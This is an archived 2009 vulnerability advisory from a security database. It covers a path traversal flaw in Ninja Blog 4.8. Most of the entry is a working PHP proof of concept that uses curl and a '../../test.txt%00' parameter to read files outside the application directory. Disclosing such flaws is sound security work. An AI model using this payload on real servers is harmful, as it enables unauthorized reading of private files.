Ninja Blog 4.8 Remote Information Disclosure Vulnerability

ID SSV:17751
Type seebug
Reporter Root
Modified 2009-01-19T00:00:00


No description provided by source.

Version(s): Ninja Blog 4.8 (May also affect earlier versions)
Credit: Danny Moules
Critical: Yes

See PUSH 55 Advisory at


Due to insufficient validation of client-side data, we can alter the path of files to be read to a file outside the intended directory.

The following PoC will read a file named 'test.txt' one level above the application folder.



$strToRead = "../../test.txt%00"; //Designates 'test.txt', sat one level above the application folder, to be read
$strSite = ""; //Don't forget the trailing slash

$objCurl = curl_init();
curl_setopt($objCurl, CURLOPT_URL, $strSite."entries/index.php?cat=".$strToRead);
curl_setopt($objCurl, CURLOPT_RETURNTRANSFER, true);

echo("Getting data...\n");
$strDump = curl_exec($objCurl);


echo("<div style=\"border: solid 2px black; padding: 10px; margin: 10px;\">$strDump</div>\n");


# [2009-01-19]